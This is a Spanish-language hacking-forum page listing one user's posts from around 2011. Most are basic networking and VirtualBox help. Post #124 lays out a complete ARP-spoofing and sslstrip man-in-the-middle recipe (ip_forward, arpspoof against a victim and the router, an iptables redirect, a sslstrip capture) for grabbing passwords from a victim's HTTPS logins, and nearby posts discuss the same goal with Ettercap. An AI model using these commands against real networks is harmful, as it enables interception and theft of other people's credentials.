Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - SokarTefnut

#121
Foro Libre / Re: Burradas informáticas CSI
12 Marzo 2011, 09:42 AM
Que tecnologia y software sería necesario para hacer ésto en apenas un minuto y medio ?. Increible el número de burradas.


#122
Yo intenté conseguir lo que estas mencionando, pero con Wireshark solo ves el contenido del paquete cifrado,se usa un cifrado simétrico.
En este enlace aparece una forma de ataque basada en SSLSTRIP:

http://foro.elhacker.net/hacking_avanzado/ettercap_contrasena_ssl_cual_es_mejor_forma-t321215.0.html
#123
No logro capturar nada, ni con el procedimiento explicado anteriormente, el archivo de captura se crea, pero siempre queda vacio, algo falla.

El ARP spoofing funciona correctamente, si miro la caché ARP de la víctima, me aparecen las MAC direccionadas hacia la maquina atacante, tanto ésta como el server.

¿ No es necesario direccionar el SSLSTRIP hacia la interfaz de red en uso ? (En mi caso eth0)
#124
Gracias por la respuesta,creo que encontré la manera de romper SSL usando sslstrip:

1.- Habilitamos la capacidad para reenvío (routing) del kernel
echo 1 > /proc/sys/net/ipv4/ip_forward   

2.- Comenzamos el envenenamiento ARP
    (arpspoof -i {interfaz_red} -t {ip_victima} {ip_router})
arpspoof -i eth0 -t 192.168.1.100 192.168.1.1

3.- Cambiamos la redireccion de puertos usando las iptables,de esta
    manera,estaremos transparentes para la victima,que podrá logearse
    sin problemas:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000

4.- Comenzamos con sslstrip (sslstrip.py -w {nombre_del_archivo_de_captura})
sslstrip -w  miarchivo  

5.- Abrir otra shell si queremos ver en tiempo real la informacion
tail -f miarchivo



#126
Hola a todos, llevo poco tiempo en el mundo del Hacking,y me doy cuenta de que cuanto mas estudio, mas parece quedarme por aprender.

Tras analizar con Wireshark el trafico generado por cierta pagina web de entrada de usuario y contraseña, observo que utiliza el protocolo SSL, haciendo ARP-Spoof con Ettercap,éste no parece ser capaz de descifrar éste protocolo,aunque he leido que Ettercap es capaz.

Mi pregunta es si alguien sabe el procedimiento,o que pluggin es necesario para conseguirlo.
Lo he intentado desde Windows, y desde Linux,con BackTrack, pero ni en modo consola lo he logrado.
Gracias por cualquier ayuda o sugerencia.
#127
El comando ipconfig /all te indica solamente direccion IP de tu red interna,normalmente saldrás a internet a traves de un router o modem, y es tu ISP quien te asigna la IP pública, que es con la que navegas en internet, no tienen nada que ver una con la otra.

Hay una forma sencilla de saber si estás a traves de un proxy, antes de usar el
proxy,entra a www.ip-adress.com/ip_tracer/  ,anota tu IP pública.
Configura ahora el navegador para que use el proxy y vuelve a entrar a iptrace,
si el resultado es diferente, entonces estas navegando a traves de un proxy.
#128
el host es Xp(SP3)
#129
Supongo que estaras conectando via ethernet, es posible que no tengas activado en adaptador de red, para saberlo teclea ifconfig, dependiendo de tu equipo al menos te deberia aparecer una tarjeta, nombrada como eth0.
Si no aparece arrancala con ifconfig eth0 up, repite ahora de nuevo con
ifconfig y deberia aparecer.
A continuacion,para activar DHCP y que te adquiera IP de algun servidor, teclea dhclient eth0.
#130
Yo tengo montado BackTrack en la Virtualbox, y el operativo host es Xp, la manera de instalarlo en modo consola fue:

- Pulsar sobre Dispositivos > << Instalar Guest Additions >>
- Montar la imagen,en mi caso  mount /dev/hdc/ /mnt/
- Si vas al directorio /mnt veras una serie de archivos,uno de ellos llamado
  VBoxLinuxAdditions.run
- ejecuta éste archivo, y luego de reiniciar ya estaran instaladas.